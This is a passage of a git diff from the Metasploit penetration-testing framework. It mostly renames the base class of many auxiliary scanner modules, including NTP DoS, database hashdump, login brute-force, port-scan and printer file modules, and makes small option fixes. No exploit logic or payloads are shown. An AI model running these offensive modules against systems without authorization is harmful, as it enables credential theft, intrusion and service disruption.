b/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb index 5c21a67f68..c549f03e37 100644 --- a/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb +++ b/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb b/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb index ba12f61143..c9e8f5bb7b 100644 --- a/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb +++ b/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb @@ -8,7 +8,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/nessus/nessus_rest_login.rb b/modules/auxiliary/scanner/nessus/nessus_rest_login.rb index 88aef9dc9b..1469af89cc 100644 --- a/modules/auxiliary/scanner/nessus/nessus_rest_login.rb +++ b/modules/auxiliary/scanner/nessus/nessus_rest_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/nessus' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Auxiliary 'DefaultOptions' => { 'SSL' => true, - 'SSLVersion' => 'TLS1' } )) register_options( diff --git a/modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb b/modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb index e687f70ddf..295fe10f58 100644 --- a/modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb +++ b/modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb @@ -9,7 +9,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/nessus/nessus_xmlrpc_ping.rb b/modules/auxiliary/scanner/nessus/nessus_xmlrpc_ping.rb index 412c93108b..aab6e9f514 100644 --- a/modules/auxiliary/scanner/nessus/nessus_xmlrpc_ping.rb +++ b/modules/auxiliary/scanner/nessus/nessus_xmlrpc_ping.rb @@ -9,7 +9,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/netbios/nbname.rb b/modules/auxiliary/scanner/netbios/nbname.rb index 64b9befe91..fa88313e53 100644 --- a/modules/auxiliary/scanner/netbios/nbname.rb +++ b/modules/auxiliary/scanner/netbios/nbname.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/netbios/nbname_probe.rb b/modules/auxiliary/scanner/netbios/nbname_probe.rb index fe990c8685..d1d9130fda 100644 --- a/modules/auxiliary/scanner/netbios/nbname_probe.rb +++ b/modules/auxiliary/scanner/netbios/nbname_probe.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/nexpose/nexpose_api_login.rb b/modules/auxiliary/scanner/nexpose/nexpose_api_login.rb index 0953d09cec..85d3d81a91 100644 --- a/modules/auxiliary/scanner/nexpose/nexpose_api_login.rb +++ b/modules/auxiliary/scanner/nexpose/nexpose_api_login.rb @@ -9,7 +9,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/nfs/nfsmount.rb b/modules/auxiliary/scanner/nfs/nfsmount.rb index fd2aee0706..aebc979928 100644 --- a/modules/auxiliary/scanner/nfs/nfsmount.rb +++ b/modules/auxiliary/scanner/nfs/nfsmount.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SunRPC include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ntp/ntp_monlist.rb b/modules/auxiliary/scanner/ntp/ntp_monlist.rb index ba17c40926..a1cc544140 100644 --- a/modules/auxiliary/scanner/ntp/ntp_monlist.rb +++ b/modules/auxiliary/scanner/ntp/ntp_monlist.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Udp @@ -37,12 +37,12 @@ class Metasploit3 < Msf::Auxiliary register_options( [ OptInt.new('RETRY', [false, "Number of tries to query the NTP server", 3]), - OptBool.new('SHOW_LIST', [false, 'Show the recent clients list', 'false']) + OptBool.new('SHOW_LIST', [false, 'Show the recent clients list', false]) ], self.class) register_advanced_options( [ - OptBool.new('StoreNTPClients', [true, 'Store NTP clients as host records in the database', 'false']) + OptBool.new('StoreNTPClients', [true, 'Store NTP clients as host records in the database', false]) ], self.class) end diff --git a/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb b/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb index 104e73a527..3c9fd1e670 100644 --- a/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb +++ b/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb b/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb index c2d7653db8..ed78121c35 100644 --- a/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb b/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb index 900c9b7fad..47e78484c0 100644 --- a/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/scanner/ntp/ntp_readvar.rb b/modules/auxiliary/scanner/ntp/ntp_readvar.rb index 98cb2a0d4c..1da9bb99e7 100644 --- a/modules/auxiliary/scanner/ntp/ntp_readvar.rb +++ b/modules/auxiliary/scanner/ntp/ntp_readvar.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Udp include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb b/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb index f31ee5f258..1e32c29acd 100644 --- a/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb b/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb index eb4ebbc44a..f83e1350f8 100644 --- a/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb b/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb index 9913e40b1c..3e94f7c34e 100644 --- a/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/scanner/openvas/openvas_gsad_login.rb b/modules/auxiliary/scanner/openvas/openvas_gsad_login.rb index 0d0e0d3916..d4cc0f4256 100644 --- a/modules/auxiliary/scanner/openvas/openvas_gsad_login.rb +++ b/modules/auxiliary/scanner/openvas/openvas_gsad_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/openvas/openvas_omp_login.rb b/modules/auxiliary/scanner/openvas/openvas_omp_login.rb index c778ba15ca..15c51b99d2 100644 --- a/modules/auxiliary/scanner/openvas/openvas_omp_login.rb +++ b/modules/auxiliary/scanner/openvas/openvas_omp_login.rb @@ -4,7 +4,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/openvas/openvas_otp_login.rb b/modules/auxiliary/scanner/openvas/openvas_otp_login.rb index fbf870fb2d..e215288450 100644 --- a/modules/auxiliary/scanner/openvas/openvas_otp_login.rb +++ b/modules/auxiliary/scanner/openvas/openvas_otp_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/oracle/emc_sid.rb b/modules/auxiliary/scanner/oracle/emc_sid.rb index f72286bd28..87737d307d 100644 --- a/modules/auxiliary/scanner/oracle/emc_sid.rb +++ b/modules/auxiliary/scanner/oracle/emc_sid.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/oracle/isqlplus_login.rb b/modules/auxiliary/scanner/oracle/isqlplus_login.rb index fa717b7ec0..d96b46579d 100644 --- a/modules/auxiliary/scanner/oracle/isqlplus_login.rb +++ b/modules/auxiliary/scanner/oracle/isqlplus_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb b/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb index e3ba450180..9c936d3938 100644 --- a/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb +++ b/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/oracle/oracle_hashdump.rb b/modules/auxiliary/scanner/oracle/oracle_hashdump.rb index c3a0442d33..e06bac1f7b 100644 --- a/modules/auxiliary/scanner/oracle/oracle_hashdump.rb +++ b/modules/auxiliary/scanner/oracle/oracle_hashdump.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/oracle/oracle_login.rb b/modules/auxiliary/scanner/oracle/oracle_login.rb index b733440c72..19935590ea 100644 --- a/modules/auxiliary/scanner/oracle/oracle_login.rb +++ b/modules/auxiliary/scanner/oracle/oracle_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Nmap diff --git a/modules/auxiliary/scanner/oracle/sid_brute.rb b/modules/auxiliary/scanner/oracle/sid_brute.rb index a61284d5fd..a670e1eb02 100644 --- a/modules/auxiliary/scanner/oracle/sid_brute.rb +++ b/modules/auxiliary/scanner/oracle/sid_brute.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TNS include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/oracle/sid_enum.rb b/modules/auxiliary/scanner/oracle/sid_enum.rb index 7b24a42b36..d953f819a9 100644 --- a/modules/auxiliary/scanner/oracle/sid_enum.rb +++ b/modules/auxiliary/scanner/oracle/sid_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TNS include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/oracle/spy_sid.rb b/modules/auxiliary/scanner/oracle/spy_sid.rb index 3b740f7643..389baf3385 100644 --- a/modules/auxiliary/scanner/oracle/spy_sid.rb +++ b/modules/auxiliary/scanner/oracle/spy_sid.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/oracle/tnslsnr_version.rb b/modules/auxiliary/scanner/oracle/tnslsnr_version.rb index 3bd78c1437..4450a690bb 100644 --- a/modules/auxiliary/scanner/oracle/tnslsnr_version.rb +++ b/modules/auxiliary/scanner/oracle/tnslsnr_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/oracle/tnspoison_checker.rb b/modules/auxiliary/scanner/oracle/tnspoison_checker.rb index aab795941c..30e5c76522 100644 --- a/modules/auxiliary/scanner/oracle/tnspoison_checker.rb +++ b/modules/auxiliary/scanner/oracle/tnspoison_checker.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/oracle/xdb_sid.rb b/modules/auxiliary/scanner/oracle/xdb_sid.rb index c07928617e..fae6c4f40c 100644 --- a/modules/auxiliary/scanner/oracle/xdb_sid.rb +++ b/modules/auxiliary/scanner/oracle/xdb_sid.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb b/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb index 8fe5687b47..4e7ff072d0 100644 --- a/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb +++ b/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb b/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb index d787bf7863..b442daa78d 100644 --- a/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb +++ b/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb @@ -5,7 +5,7 @@ require 'msf/core/exploit/tcp' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb b/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb index ab83d9191d..348bf2354c 100644 --- a/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb +++ b/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb b/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb index 693c294945..e70063ed56 100644 --- a/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb +++ b/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/pop3/pop3_login.rb b/modules/auxiliary/scanner/pop3/pop3_login.rb index 98ae8f9257..b869bea541 100644 --- a/modules/auxiliary/scanner/pop3/pop3_login.rb +++ b/modules/auxiliary/scanner/pop3/pop3_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/pop3' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/pop3/pop3_version.rb b/modules/auxiliary/scanner/pop3/pop3_version.rb index ff3d1828c2..f2d1d45f4f 100644 --- a/modules/auxiliary/scanner/pop3/pop3_version.rb +++ b/modules/auxiliary/scanner/pop3/pop3_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/portmap/portmap_amp.rb b/modules/auxiliary/scanner/portmap/portmap_amp.rb index abc7f8ca76..b3e4fd2d44 100644 --- a/modules/auxiliary/scanner/portmap/portmap_amp.rb +++ b/modules/auxiliary/scanner/portmap/portmap_amp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/portscan/ack.rb b/modules/auxiliary/scanner/portscan/ack.rb index e020120a0e..d6b5df3200 100644 --- a/modules/auxiliary/scanner/portscan/ack.rb +++ b/modules/auxiliary/scanner/portscan/ack.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/portscan/ftpbounce.rb b/modules/auxiliary/scanner/portscan/ftpbounce.rb index d84256ff30..ddd058497e 100644 --- a/modules/auxiliary/scanner/portscan/ftpbounce.rb +++ b/modules/auxiliary/scanner/portscan/ftpbounce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Order is important here include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/portscan/syn.rb b/modules/auxiliary/scanner/portscan/syn.rb index b59ee5c028..2455423ec4 100644 --- a/modules/auxiliary/scanner/portscan/syn.rb +++ b/modules/auxiliary/scanner/portscan/syn.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/portscan/tcp.rb b/modules/auxiliary/scanner/portscan/tcp.rb index 299c1210af..857d61f11e 100644 --- a/modules/auxiliary/scanner/portscan/tcp.rb +++ b/modules/auxiliary/scanner/portscan/tcp.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/scanner/portscan/xmas.rb b/modules/auxiliary/scanner/portscan/xmas.rb index 8f64a84695..a09a65cc48 100644 --- a/modules/auxiliary/scanner/portscan/xmas.rb +++ b/modules/auxiliary/scanner/portscan/xmas.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/postgres/postgres_dbname_flag_injection.rb b/modules/auxiliary/scanner/postgres/postgres_dbname_flag_injection.rb index 9e48bfc0ec..12c8177688 100644 --- a/modules/auxiliary/scanner/postgres/postgres_dbname_flag_injection.rb +++ b/modules/auxiliary/scanner/postgres/postgres_dbname_flag_injection.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/postgres/postgres_hashdump.rb b/modules/auxiliary/scanner/postgres/postgres_hashdump.rb index a4c3066cfb..ddbf1a926b 100644 --- a/modules/auxiliary/scanner/postgres/postgres_hashdump.rb +++ b/modules/auxiliary/scanner/postgres/postgres_hashdump.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Postgres include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/postgres/postgres_login.rb b/modules/auxiliary/scanner/postgres/postgres_login.rb index 9c2d96dc71..5c5bf308d3 100644 --- a/modules/auxiliary/scanner/postgres/postgres_login.rb +++ b/modules/auxiliary/scanner/postgres/postgres_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/postgres' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Postgres include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/postgres/postgres_schemadump.rb b/modules/auxiliary/scanner/postgres/postgres_schemadump.rb index b42313a194..59915acedc 100644 --- a/modules/auxiliary/scanner/postgres/postgres_schemadump.rb +++ b/modules/auxiliary/scanner/postgres/postgres_schemadump.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Postgres include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/postgres/postgres_version.rb b/modules/auxiliary/scanner/postgres/postgres_version.rb index 8a2bea7d9c..d8e6036db0 100644 --- a/modules/auxiliary/scanner/postgres/postgres_version.rb +++ b/modules/auxiliary/scanner/postgres/postgres_version.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Postgres include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/printer/printer_delete_file.rb b/modules/auxiliary/scanner/printer/printer_delete_file.rb index 4b561b4877..6dc859651d 100644 --- a/modules/auxiliary/scanner/printer/printer_delete_file.rb +++ b/modules/auxiliary/scanner/printer/printer_delete_file.rb @@ -6,7 +6,7 @@ require "msf/core" require "rex/proto/pjl" -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/printer/printer_download_file.rb b/modules/auxiliary/scanner/printer/printer_download_file.rb index 64c04d999d..4e4f2293e7 100644 --- a/modules/auxiliary/scanner/printer/printer_download_file.rb +++ b/modules/auxiliary/scanner/printer/printer_download_file.rb @@ -6,7 +6,7 @@ require "msf/core" require "rex/proto/pjl" -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/printer/printer_env_vars.rb b/modules/auxiliary/scanner/printer/printer_env_vars.rb index c1546ccb66..884764477b 100644 --- a/modules/auxiliary/scanner/printer/printer_env_vars.rb +++ b/modules/auxiliary/scanner/printer/printer_env_vars.rb @@ -6,7 +6,7 @@ require "msf/core" require "rex/proto/pjl" -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/printer/printer_list_dir.rb b/modules/auxiliary/scanner/printer/printer_list_dir.rb index 49f70ec717..068705657a 100644 --- a/modules/auxiliary/scanner/printer/printer_list_dir.rb +++ b/modules/auxiliary/scanner/printer/printer_list_dir.rb @@ -6,7 +6,7 @@ require "msf/core" require "rex/proto/pjl" -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/printer/printer_list_volumes.rb b/modules/auxiliary/scanner/printer/printer_list_volumes.rb index d596504844..4d6e01235e 100644 --- a/modules/auxiliary/scanner/printer/printer_list_volumes.rb +++ b/modules/auxiliary/scanner/printer/printer_list_volumes.rb @@ -6,7 +6,7 @@ require "msf/core" require "rex/proto/pjl" -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/printer/printer_ready_message.rb b/modules/auxiliary/scanner/printer/printer_ready_message.rb index 610a1f6bb4..10445e7ffd 100644 --- a/modules/auxiliary/scanner/printer/printer_ready_message.rb +++ b/modules/auxiliary/scanner/printer/printer_ready_message.rb @@ -6,7 +6,7 @@ require "msf/core" require "rex/proto/pjl" -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/printer/printer_upload_file.rb b/modules/auxiliary/scanner/printer/printer_upload_file.rb index 3f0fe0229e..3971e8b1cf 100644 --- a/modules/auxiliary/scanner/printer/printer_upload_file.rb +++ b/modules/auxiliary/scanner/printer/printer_upload_file.rb @@ -6,7 +6,7 @@ require "msf/core" require "rex/proto/pjl" -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/printer/printer_version_info.rb b/modules/auxiliary/scanner/printer/printer_version_info.rb index 5171a46a3c..d23312a60e 100644 --- a/modules/auxiliary/scanner/printer/printer_version_info.rb +++ b/modules/auxiliary/scanner/printer/printer_version_info.rb @@ -6,7 +6,7 @@ require "msf/core" require "rex/proto/pjl" -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/quake/server_info.rb b/modules/auxiliary/scanner/quake/server_info.rb index f8012e7a4c..f0a4e2b0e4 100644 --- a/modules/auxiliary/scanner/quake/server_info.rb +++ b/modules/auxiliary/scanner/quake/server_info.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/quake' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner include Rex::Proto::Quake diff --git a/modules/auxiliary/scanner/rdp/ms12_020_check.rb b/modules/auxiliary/scanner/rdp/ms12_020_check.rb index d9fca848d7..18edd5f1e8 100644 --- a/modules/auxiliary/scanner/rdp/ms12_020_check.rb +++ b/modules/auxiliary/scanner/rdp/ms12_020_check.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner @@ -36,13 +36,13 @@ class Metasploit3 < Msf::Auxiliary register_options( [ - OptInt.new('RPORT', [ true, 'Remote port running RDP', '3389' ]) + OptPort.new('RPORT', [ true, 'Remote port running RDP', 3389 ]) ], self.class) end def check_rdp # code to check if RDP is open or not - vprint_status("#{peer} Verifying RDP protocol...") + vprint_status("Verifying RDP protocol...") # send connection sock.put(connection_request) @@ -128,7 +128,7 @@ class Metasploit3 < Msf::Auxiliary def check_rdp_vuln # check if rdp is open unless check_rdp - vprint_status "#{peer} Could not connect to RDP." + vprint_status "Could not connect to RDP." return Exploit::CheckCode::Unknown end diff --git a/modules/auxiliary/scanner/redis/file_upload.rb b/modules/auxiliary/scanner/redis/file_upload.rb index 3842aea864..fcdf313df9 100644 